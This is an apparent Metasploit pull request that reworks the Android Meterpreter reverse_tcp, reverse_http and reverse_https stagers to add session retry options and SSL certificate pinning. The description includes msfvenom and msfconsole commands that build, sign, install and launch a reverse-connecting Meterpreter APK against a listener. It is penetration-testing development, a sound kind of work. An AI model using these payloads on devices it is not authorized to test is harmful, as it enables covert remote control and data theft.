### PR TITLE
add support for HandlerSSLCert, SessionRetryTotal and SessionRetryWait on Android

### DIFF
--- a/lib/msf/base/sessions/meterpreter_android.rb
+++ b/lib/msf/base/sessions/meterpreter_android.rb
@@ -19,13 +19,6 @@ class Meterpreter_Java_Android < Msf::Sessions::Meterpreter_Java_Java
     self.platform = 'java/android'
   end
 
-  def load_android
-    original = console.disable_output  
-    console.disable_output = true
-    console.run_single('load android')
-    console.disable_output = original
-  end
-
 end
 
 end

--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -64,12 +64,6 @@ module MeterpreterOptions
         end
       end
 
-      if session.platform =~ /android/i
-        if datastore['AutoLoadAndroid']
-          session.load_android
-        end
-      end
-
       [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
         if (datastore[key].empty? == false)
           args = Shellwords.shellwords( datastore[key] )

--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -31,6 +31,11 @@ module Msf::Payload::Dalvik
     [str.length].pack("N") + str
   end
 
+  def apply_options(classes)
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['SessionRetryTotal'].to_s)
+    string_sub(classes, 'SSSS                                ', "SSSS" + datastore['SessionRetryWait'].to_s)
+  end
+
   def string_sub(data, placeholder="", input="")
     data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
   end

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -24,11 +24,6 @@ module Metasploit3
       'Handler'       => Msf::Handler::ReverseHttp,
       'Stager'        => {'Payload' => ""}
       ))
-
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
   end
 
   def generate_jar(opts={})
@@ -40,7 +35,8 @@ module Metasploit3
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
     string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + host + ":" + port)
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    apply_options(classes)
+
     jar.add_file("classes.dex", fix_dex_header(classes))
 
     files = [

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -5,6 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_http'
+require 'msf/core/payload/uuid_options'
 
 module Metasploit3
 
@@ -12,6 +13,7 @@ module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Dalvik
+  include Msf::Payload::UUIDOptions
 
   def initialize(info = {})
     super(merge_info(info,
@@ -37,7 +39,7 @@ module Metasploit3
     lurl = "ZZZZhttp://#{datastore["LHOST"]}"
     lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
     lurl << "/"
-    lurl << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
+    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
     string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -27,23 +27,28 @@ module Metasploit3
   end
 
   def generate_jar(opts={})
-    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
-    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
-    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+    # Default URL length is 30-256 bytes
+    uri_req_len = 30 + rand(256-30)
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
 
-    jar = Rex::Zip::Jar.new
+    lurl = "ZZZZhttp://#{datastore["LHOST"]}"
+    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    lurl << "/"
+    lurl << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
-    string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + host + ":" + port)
+    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
     apply_options(classes)
 
+    jar = Rex::Zip::Jar.new
     jar.add_file("classes.dex", fix_dex_header(classes))
-
     files = [
       [ "AndroidManifest.xml" ],
       [ "resources.arsc" ]
     ]
-
     jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
     jar.build_manifest
 

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -24,11 +24,6 @@ module Metasploit3
       'Handler'       => Msf::Handler::ReverseHttps,
       'Stager'        => {'Payload' => ""}
     ))
-
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
   end
 
   def generate_jar(opts={})
@@ -40,7 +35,8 @@ module Metasploit3
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
     string_sub(classes, 'ZZZZ                                ', "ZZZZhttps://" + host + ":" + port)
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    apply_options(classes)
+
     jar.add_file("classes.dex", fix_dex_header(classes))
 
     files = [

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -5,6 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
+require 'msf/core/payload/uuid_options'
 
 module Metasploit3
 
@@ -12,6 +13,7 @@ module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Dalvik
+  include Msf::Payload::UUIDOptions
 
   def initialize(info = {})
     super(merge_info(info,
@@ -37,7 +39,7 @@ module Metasploit3
     lurl = "ZZZZhttps://#{datastore["LHOST"]}"
     lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
     lurl << "/"
-    lurl << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
+    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
     string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)

--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -26,11 +26,6 @@ module Metasploit3
       'Handler'		=> Msf::Handler::ReverseTcp,
       'Stager'		=> {'Payload' => ""}
     ))
-
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
   end
 
   def generate_jar(opts={})
@@ -40,7 +35,8 @@ module Metasploit3
 
     string_sub(classes, 'XXXX127.0.0.1                       ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST']
     string_sub(classes, 'YYYY4444                            ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT']
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    apply_options(classes)
+
     jar.add_file("classes.dex", fix_dex_header(classes))
 
     files = [


### PR DESCRIPTION
This change adds support for the SessionRetryTotal and SessionRetryWait advanced options.
To make this work the android meterpreter payload has to run on a single thread, otherwise we end up spawning multiple sessions (one every SessionRetryWait period).
This requires https://github.com/rapid7/metasploit-javapayload/pull/36 to work correctly.
Verification:
- [x] Set a non-default value for SessionRetryTotal and SessionRetryWait and ensure the payload waits the SessionRetryWait second period between retries for up to a total of SessionRetryTotal seconds.
- [x] Use the `set_timeouts -w 60` command within the session to set the SessionRetryWait. If you kill connection or handler the payload should take 60 seconds to reconnect.
- [x] Validate the HandlerSSLCert parameter like so:

```
# generate two different certs, e.g
$ ./tools/msf_irb_shell
>> c1 = Rex::Socket::SslTcpServer.ssl_generate_certificate
>> File.open("correct.pem", "wb"){|fd| fd.puts c1[0].to_s; fd.puts c1[1].to_s }
>> c2 = Rex::Socket::SslTcpServer.ssl_generate_certificate
>> File.open("incorrect.pem", "wb"){|fd| fd.puts c2[0].to_s; fd.puts c2[1].to_s }
>> exit
# start a handler
./msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_https; set lhost $LHOST; set lport 4444; set HandlerSSLCert correct.pem; set StagerVerifySSLCert true; set ExitOnSession false; run -j"
# on a new shell, with an android device/emulator attached with adb
./msfvenom -p android/meterpreter/reverse_https LHOST=$LHOST LPORT=4444 StagerVerifySSLCert=true HandlerSSLCert=./correct.pem -o android.apk
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA android.apk androiddebugkey
adb install android.apk
adb shell am start -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
```
- [x] If the certificate on the handler and payload are different (e.g correct.pem and incorrect.pem) the payload will not connect. If they match the payload should connect as normal.
